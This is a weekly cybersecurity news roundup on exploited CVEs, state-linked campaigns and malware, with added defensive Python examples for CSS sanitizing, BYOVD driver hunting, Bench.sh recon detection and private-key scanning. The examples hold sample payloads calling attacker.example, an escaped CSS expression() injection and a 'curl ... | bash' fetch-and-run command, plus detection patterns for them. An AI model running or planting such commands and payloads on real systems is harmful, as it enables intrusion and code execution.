Cyber Security Week in Review: March 20, 2026

The US Cybersecurity and Infrastructure Security Agency (CISA) has warned about active exploitation of several vulnerabilities across different software products. One is CVE-2025-66376 in Synacor Zimbra Collaboration Suite, a stored cross-site scripting flaw that attackers trigger through CSS in email content. The flaw was fixed in versions 10.0.18 and 10.1.13.

Another vulnerability is CVE-2026-20963 affecting Microsoft Office SharePoint. It lets attackers execute code remotely through deserialization of untrusted data and was fixed in January 2026.

The third flaw is CVE-2025-47813 affecting Wing FTP Server. The vulnerability allows a remote user to gain access to potentially sensitive information; it was addressed in version 7.4.4.

Amazon's threat hunting team reported that the Interlock ransomware operation has been exploiting CVE-2026-20131 in Cisco Secure Firewall Management Center since January 2026. CISA has also flagged the flaw as actively exploited.

A novel exploit kit dubbed DarkSword is being used to compromise Apple iPhones and steal sensitive user data. The threat targets devices running iOS versions 18.4 through 18.7 and has been linked to multiple threat actors, including the suspected Russian group UNC6353 previously linked to the Coruna exploit chain. According to researchers, DarkSword leverages six known vulnerabilities (CVE-2025-31277, CVE-2025-43529, CVE-2026-20700, CVE-2025-14174, CVE-2025-43510, and CVE-2025-43520) to gain deep access to compromised devices.

A new Barracuda report examines Sandworm (aka APT44), a Russian GRU-backed threat group known for destructive attacks against Ukraine, including the 2015 power grid outages and the 2017 NotPetya incident. The group focuses on disruption and destruction rather than simple espionage. It has been observed using data-wiping malware such as Zerolot, Sting, CaddyWiper and DynoWiper to damage systems, targeting industrial control systems to cause power outages, and deploying Infamous Chisel to infect Ukrainian military Android devices. Sandworm is also believed to be behind the Cyclops Blink botnet, which infects firewall devices. As of 2026, the group continues to attack Ukrainian energy and government sectors with new tools like BadPilot while expanding operations against Western energy, telecommunications and government organizations.

Ukrainian organizations were targeted in a cyberespionage campaign in February 2026, likely linked to Russian threat actors. According to LAB52, the attack resembles earlier operations by the group Laundry Bear (aka UAC-0190 or Void Blizzard). The campaign used fake judicial and charity messages to spread DRILLAPP, a JavaScript-based backdoor that runs inside Microsoft Edge. Once installed, it can steal files, access the microphone and capture webcam images.

In the meantime, Seqrite researchers have discovered a campaign they dubbed "Operation Ghostmail," in which the Russian state-backed group APT28 (aka Fancy Bear) targeted Ukraine's State Hydrographic Service, which supports maritime navigation and critical infrastructure. The group launched a phishing campaign that exploits the Zimbra webmail vulnerability CVE-2025-66376, which lets attackers inject malicious code into emails that executes when the message is viewed in the browser.
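Both the CISA item above and Operation Ghostmail turn on the same weakness: CSS carried in an email reaching the browser's renderer. The article does not describe which CSS construct the Zimbra flaw abuses, so what follows is an added, generic example of the defence a webmail client needs, written for this page rather than taken from Zimbra or from the researchers. It drops `<style>` elements outright, keeps only an allowlist of inline properties, rejects values that can load remote resources or execute script, and decodes CSS escapes before checking, because `exp\72 ession(` is the classic way past a naive filter. The property allowlist is an assumption; a real deployment would tune it.

```python
"""Allowlist-based sanitizer for CSS inside HTML email (added example).

Generic defence against the CSS-to-XSS class: drop <style> elements outright
and keep only allowlisted inline properties whose values contain no construct
that can execute script or load remote resources.
"""
import html
import re

# Assumed allowlist; tune for the mail client's rendering needs.
ALLOWED_PROPERTIES = {
    "color", "background-color", "font-family", "font-size", "font-weight",
    "font-style", "text-align", "text-decoration", "margin", "padding",
    "border", "width", "height", "line-height",
}

# Value fragments that must never reach a renderer: remote loads and the
# legacy/proprietary hooks that historically turned CSS into script execution.
_DANGEROUS = re.compile(
    r"url\s*\(|expression\s*\(|javascript:|vbscript:|@import|-moz-binding|[<>]",
    re.IGNORECASE,
)
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})\s?|\\(.)", re.DOTALL)
_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
_STYLE_ELEMENT = re.compile(r"<style\b[^>]*>.*?</style\s*>", re.IGNORECASE | re.DOTALL)
_STYLE_ATTR = re.compile(r"""\sstyle\s*=\s*(?:"([^"]*)"|'([^']*)')""", re.IGNORECASE)


def decode_css_escapes(text: str) -> str:
    """Resolve CSS hex/char escapes so 'exp\\72 ession(' is checked as 'expression('."""
    def _one(m: re.Match) -> str:
        if m.group(1) is not None:
            try:
                return chr(int(m.group(1), 16))
            except ValueError:          # code point out of range
                return "\ufffd"
        return m.group(2)
    return _CSS_ESCAPE.sub(_one, text)


def sanitize_style_attr(value: str) -> str:
    """Return the safe subset of one style="" attribute, normalised to 'prop: value'."""
    kept = []
    for decl in _COMMENT.sub("", value).split(";"):
        if ":" not in decl:
            continue
        prop, val = decl.split(":", 1)
        prop = decode_css_escapes(prop).strip().lower()
        val = val.strip()
        # Check the *decoded* value: escapes are the classic filter bypass.
        if prop in ALLOWED_PROPERTIES and not _DANGEROUS.search(decode_css_escapes(val)):
            kept.append(f"{prop}: {val}")
    return "; ".join(kept)


def sanitize_email_html(doc: str) -> str:
    """Strip <style> blocks and rewrite every inline style attribute in an HTML email."""
    doc = _STYLE_ELEMENT.sub("", doc)

    def _rewrite(m: re.Match) -> str:
        raw = m.group(1) if m.group(1) is not None else m.group(2)
        clean = sanitize_style_attr(html.unescape(raw))
        return f' style="{html.escape(clean, quote=True)}"' if clean else ""

    return _STYLE_ATTR.sub(_rewrite, doc)


if __name__ == "__main__":
    # Constructed message body for the demo, not a real exploit sample.
    sample = (
        '<style>body{background:url(https://attacker.example/x)}</style>'
        '<div style="color:red; width:exp\\72 ession(alert(1))">hi</div>'
    )
    print(sanitize_email_html(sample))   # <div style="color: red">hi</div>
```

Regex-based rewriting is adequate for a demonstration; a production client should run this logic from inside an HTML parser so that attribute boundaries are determined by the parser, not by a pattern. The allowlist approach matters more than the blocklist: new CSS features keep appearing, and anything not explicitly permitted is dropped.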

Also, Russia has increased its intelligence activities in the Austrian capital, turning Vienna into an important center for electronic and satellite spying. Officials have found many satellite antennas on top of Russian buildings, especially in the Donaustadt district and the city center. The antennas can be moved and adjusted to intercept different types of communications, including those used by international organizations.

ESET has released a lengthy report based on analysis of 90 EDR killer tools used by attackers to disable security software such as Endpoint Detection and Response (EDR) products. Most EDR killers rely on legitimate but vulnerable drivers to obtain kernel-level privileges. According to the Slovak company, over half of the tools it examined use the BYOVD (bring your own vulnerable driver) technique.
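The defensive point of the ESET finding is that a BYOVD driver is usually validly signed, so signature checks alone will not catch it; what catches it is a hash blocklist plus context such as the load path. The following added example, written for this page and not taken from ESET, triages Sysmon Event ID 6 (DriverLoad) records using that event's documented fields (ImageLoaded, Hashes, Signed, Signature, SignatureStatus). The records are constructed, and the blocklist entry is a placeholder hash; in production the set would be populated from the Microsoft vulnerable driver blocklist or the LOLDrivers project.

```python
"""Triage Sysmon Event ID 6 (DriverLoad) records for BYOVD activity (added example).

The records below are constructed and the blocklist hash is a placeholder.
"""
import re

# Placeholder entry, not the hash of a real driver.
PLACEHOLDER_VULN_SHA256 = "a" * 64
VULN_DRIVER_SHA256 = {PLACEHOLDER_VULN_SHA256: "hypothetical-vendor-tool.sys"}

TRUSTED_DRIVER_DIR = re.compile(r"^[a-z]:\\windows\\system32\\drivers\\", re.IGNORECASE)


def parse_hashes(field: str) -> dict:
    """Turn Sysmon's 'SHA1=..,MD5=..,SHA256=..' string into {ALGO: lowercase hex}."""
    out = {}
    for part in field.split(","):
        if "=" in part:
            algo, value = part.split("=", 1)
            out[algo.strip().upper()] = value.strip().lower()
    return out


def assess_driver_load(event: dict) -> tuple:
    """Return (severity, reasons) for one DriverLoad record."""
    reasons = []
    sha256 = parse_hashes(event.get("Hashes", "")).get("SHA256")
    blocklisted = sha256 in VULN_DRIVER_SHA256
    if blocklisted:
        reasons.append(f"known vulnerable driver ({VULN_DRIVER_SHA256[sha256]})")
    if str(event.get("Signed", "")).lower() != "true":
        reasons.append("unsigned driver")
    elif event.get("SignatureStatus") != "Valid":
        reasons.append(f"signature status {event.get('SignatureStatus')}")
    if not TRUSTED_DRIVER_DIR.match(event.get("ImageLoaded", "")):
        reasons.append("loaded from outside the system drivers directory")
    # A blocklisted driver is high regardless of its (usually valid) signature.
    if blocklisted:
        severity = "high"
    elif reasons:
        severity = "medium"
    else:
        severity = "none"
    return severity, reasons


def hunt(events: list) -> list:
    """Return [(ImageLoaded, severity, reasons)] for every record worth a look."""
    results = []
    for ev in events:
        severity, reasons = assess_driver_load(ev)
        if severity != "none":
            results.append((ev.get("ImageLoaded"), severity, reasons))
    return results


# Constructed sample telemetry using Sysmon Event 6 field names.
SAMPLE_EVENTS = [
    {"ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
     "Hashes": f"SHA256={'0' * 64}", "Signed": "true",
     "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    # Validly signed third-party driver dropped to a user-writable path:
    # the BYOVD pattern. Only the hash match catches it.
    {"ImageLoaded": r"C:\Users\Public\vendor-tool.sys",
     "Hashes": f"SHA256={PLACEHOLDER_VULN_SHA256},MD5={'b' * 32}", "Signed": "true",
     "Signature": "Hypothetical Vendor Ltd", "SignatureStatus": "Valid"},
    {"ImageLoaded": r"C:\Windows\Temp\x.sys",
     "Hashes": f"SHA256={'f' * 64}", "Signed": "false",
     "Signature": "", "SignatureStatus": "Unavailable"},
]

if __name__ == "__main__":
    for image, severity, reasons in hunt(SAMPLE_EVENTS):
        print(severity.upper(), image, "; ".join(reasons))
```

On Windows 11 the Microsoft vulnerable driver blocklist can be enforced through HVCI / Smart App Control, which blocks the load outright; the hunting logic above is for the fleets where that enforcement is off and the only evidence is the load event.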

The Genians Security Center (GSC) has uncovered a new wave of cyberattacks linked to the KONNI advanced persistent threat (APT) campaign, a hacking operation believed to be associated with North Korean groups commonly known as Kimsuky or APT37. According to GSC, attackers distributed malicious files disguised as “stress-relief programs” through South Korea’s popular KakaoTalk messaging platform. The files were designed to infect victims’ computers and enable long-term surveillance.

A suspected China-based cyber espionage campaign has targeted military organizations across Southeast Asia in a long-running operation that dates back to at least 2020. Researchers said the campaign, tracked as CL-STA-1087, focuses on carefully targeted intelligence gathering rather than large-scale data theft. The operation leverages backdoors called AppleChris and MemFun, as well as a credential-harvesting utility known as Getpass.

In the meantime, the European Council has imposed new sanctions against two Chinese companies, an Iranian firm and two individuals accused of carrying out cyberattacks targeting EU member states and international partners.

The cyberespionage group Boggy Serpens (aka MuddyWater), linked to Iran's Ministry of Intelligence and Security (MOIS), continues to target critical sectors such as energy, maritime, finance and diplomacy across the Middle East and other regions. The group is now using AI-assisted malware with anti-analysis features, which helps it remain undetected in compromised systems for longer.

The US Department of Justice announced that it seized four websites linked to MOIS. The sites (Justicehomeland[.]org, Handala-Hack[.]to, Karmabelow80[.]org, and Handala-Redwanted[.]to) were used for hacking-related propaganda, sharing stolen data, and threatening journalists, dissidents, and others. One of the domains was also used to claim responsibility for a destructive cyberattack on US medical technology company Stryker in March 2026.

Gen Threat Labs analyzed VoidStealer, an infostealer that uses an unusual technique to bypass Application-Bound Encryption (ABE). Instead of common methods like code injection or privilege escalation, it sets hardware breakpoints (a CPU debugging feature) to pull the browser's encryption key directly out of memory.

A new Android malware called Perseus is being spread through fake TV streaming apps. It can steal passwords and banking information and even read users' personal notes. ThreatFabric researchers say it mainly targets people in Turkey and Italy and is based on leaked code from the older Cerberus banking malware.

Symantec and Carbon Black researchers have spotted a new malware called Speagle that takes over the legitimate Cobra DocGuard software to steal sensitive data from infected computers. It sends the stolen information to a compromised Cobra DocGuard server, masking the data theft as legitimate communications between client and server.

The LeakNet ransomware group is now using the ClickFix technique on hacked websites to gain initial access to victims. It also uses a new Deno-based loader that runs hidden code in memory, gathers system information and connects to its command-and-control server.

Threat actors are abusing Bench.sh, a legitimate open-source server benchmarking script, as part of post-exploitation workflows in real-world intrusions. Researchers say attackers now run Bench.sh as a lightweight reconnaissance utility after gaining initial access, since its normal output already enumerates CPU, memory, disk, network and virtualization details.
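Because Bench.sh is a legitimate tool, a detection cannot simply alert on the filename; the signal is the context. The following added example, written for this page rather than taken from the researchers, scores process-execution records: an administrator running the script from an SSH session is informational, while the same script fetched over the network and piped straight into a shell by a web-server worker running as a service account scores high. The process records, parent-process list and account list are constructed assumptions.

```python
"""Flag bench.sh executions that look like post-exploitation recon (added example).

The process records and the parent/user lists are constructed for this example.
"""
import re

BENCH_RE = re.compile(r"\bbench\.sh\b", re.IGNORECASE)
# 'curl ... | bash' / 'wget -qO- ... | sh': fetched and executed without landing on disk
PIPE_TO_SHELL_RE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z|da)?sh\b", re.IGNORECASE)

# Assumed: parents and accounts that should never run a benchmark on a healthy host.
SERVICE_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "java", "tomcat", "node", "postgres", "mysqld"}
SERVICE_USERS = {"www-data", "apache", "nginx", "nobody", "tomcat", "postgres", "mysql"}


def score_process_event(ev: dict):
    """Return a finding dict for a bench.sh execution, or None if the event is unrelated."""
    cmdline = ev.get("cmdline", "")
    if not BENCH_RE.search(cmdline):
        return None
    score, reasons = 1, ["bench.sh executed"]
    if PIPE_TO_SHELL_RE.search(cmdline):
        score += 2
        reasons.append("fetched over the network and piped into a shell")
    if ev.get("parent_image") in SERVICE_PARENTS:
        score += 3
        reasons.append(f"spawned by service process {ev['parent_image']}")
    if ev.get("user") in SERVICE_USERS:
        score += 2
        reasons.append(f"run as service account {ev['user']}")
    severity = "high" if score >= 5 else "medium" if score >= 3 else "low"
    return {"pid": ev.get("pid"), "score": score, "severity": severity, "reasons": reasons}


def scan(events: list) -> list:
    """Run the scorer over a batch of process events and keep only bench.sh findings."""
    return [f for f in map(score_process_event, events) if f]


# Constructed process-execution records (auditd/EDR style), not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4120, "user": "root", "parent_image": "sshd",
     "cmdline": "bash /root/bench.sh"},                       # admin benchmarking: low
    {"pid": 5231, "user": "www-data", "parent_image": "php-fpm",
     "cmdline": "sh -c 'curl -Ls https://example.invalid/bench.sh | bash'"},  # webshell recon: high
    {"pid": 5232, "user": "www-data", "parent_image": "php-fpm",
     "cmdline": "ls -la /var/www"},                           # unrelated
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["pid"], "; ".join(finding["reasons"]))
```

The "service parent" rule is the one worth keeping even if the Bench.sh match is removed: a web-server worker spawning `curl | bash` is a webshell or RCE signature regardless of what script comes down the pipe.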

Microsoft's threat intelligence team has uncovered a cyber-espionage campaign, attributed to a threat actor tracked as Storm-2561, that distributes fake enterprise VPN clients to harvest user credentials. The attackers use SEO poisoning to manipulate search results for terms such as "Pulse VPN download" or "Pulse Secure client." Victims who click the malicious links are redirected to spoofed websites that imitate legitimate VPN vendors, including Ivanti, Cisco and Fortinet.

A large-scale supply-chain attack linked to the GlassWorm campaign has been observed, compromising hundreds of software components across major developer platforms. Multiple security researchers report that over 400 packages, repositories, and extensions were affected in the latest wave.

Qihoo 360, one of China's biggest security vendors, accidentally shipped a highly sensitive wildcard TLS private key inside the public installer for its 360 Security Claw AI assistant. Because the file was unprotected, anyone who downloaded the software could extract the key with basic tools. The key belongs to the certificate covering the company's myclaw.360.cn platform and all its subdomains, so whoever holds it can impersonate any of those hosts.
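Mistakes of this kind are caught by scanning release artifacts for key material before they ship, the same way source repositories are scanned for secrets. The following added example, written for this page and unrelated to Qihoo 360's tooling, scans raw bytes for PEM private-key blocks, so it can be pointed at an unpacked installer directory or the archive itself. It reports the key type, whether the block decodes to a plausible DER structure (every PKCS#1, PKCS#8 and SEC1 key is a DER SEQUENCE, tag 0x30), and whether the key is at least passphrase-protected, which is the difference between an embarrassing and a critical finding. The sample "installer" is constructed, and its PEM bodies are a five-byte DER stub, not real key material.

```python
"""Scan a release artifact for embedded PEM private keys (added example).

The artifact below is constructed: its PEM bodies are a five-byte DER stub.
"""
import base64
import re
from pathlib import Path

# BEGIN/END labels must match; the body may carry 'Proc-Type'/'DEK-Info' headers
# for legacy (OpenSSL "traditional") encrypted keys.
PEM_KEY_RE = re.compile(
    rb"-----BEGIN ((?:[A-Z]+ )*PRIVATE KEY)-----\r?\n(.*?)-----END \1-----",
    re.DOTALL,
)


def find_private_keys(blob: bytes) -> list:
    """Return one finding per PEM private-key block found in blob."""
    findings = []
    for m in PEM_KEY_RE.finditer(blob):
        label = m.group(1).decode("ascii")
        lines = m.group(2).splitlines()
        headers = [ln for ln in lines if b":" in ln]
        b64 = b"".join(ln.strip() for ln in lines if b":" not in ln)
        try:
            der = base64.b64decode(b64, validate=True)
        except ValueError:
            continue   # markers around non-base64 text, e.g. a help string
        findings.append({
            "offset": m.start(),
            "label": label,
            "der_bytes": len(der),
            # Every PKCS#1/PKCS#8/SEC1 key is a DER SEQUENCE, tag 0x30.
            "well_formed": len(der) > 2 and der[0] == 0x30,
            "encrypted": label.startswith("ENCRYPTED")
                         or any(b"ENCRYPTED" in h for h in headers),
        })
    return findings


def scan_paths(paths) -> dict:
    """Map each file path to its findings; files with none are omitted."""
    results = {}
    for p in paths:
        hits = find_private_keys(Path(p).read_bytes())
        if hits:
            results[str(p)] = hits
    return results


# Constructed installer blob: binary padding around two PEM blocks.
_DER_STUB_B64 = b"MAMCAQA="   # base64 of 30 03 02 01 00, a tiny DER SEQUENCE
SAMPLE_INSTALLER = (
    b"MZ\x90\x00" + b"\x00" * 32
    + b"-----BEGIN RSA PRIVATE KEY-----\n" + _DER_STUB_B64 + b"\n-----END RSA PRIVATE KEY-----\n"
    + b"\x00" * 16
    + b"-----BEGIN EC PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,00\n\n"
    + _DER_STUB_B64 + b"\n-----END EC PRIVATE KEY-----\n"
)

if __name__ == "__main__":
    for finding in find_private_keys(SAMPLE_INSTALLER):
        print(finding)
```

The scanner tells you a key is present, not which certificate it belongs to. To confirm a found key is the one behind a wildcard certificate, compare public keys: `openssl x509 -in cert.pem -noout -pubkey` against `openssl pkey -in found.key -pubout`; a match means the certificate must be revoked and reissued, since the installer cannot be un-downloaded.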

US authorities, together with law enforcement agencies from Canada and Germany, have shut down four major IoT botnets: Aisuru, KimWolf, JackSkid and Mossad. The botnets infected millions of devices such as cameras and routers and were used to launch massive DDoS attacks worldwide, some reaching record-breaking sizes. The operators sold access to the infected devices to other criminals, who used them for attacks and extortion.

An international law enforcement operation coordinated by INTERPOL has disrupted large-scale cybercrime networks worldwide, sinkholing tens of thousands of malicious IP addresses and seizing key digital infrastructure. The operation, codenamed ‘Operation Synergia III,’ ran from July 2025 to January 2026 and involved authorities from 72 countries. Law enforcement officers seized 212 electronic devices and servers linked to cybercriminal activity and arrested 94 suspects. Another 110 individuals are currently under investigation.
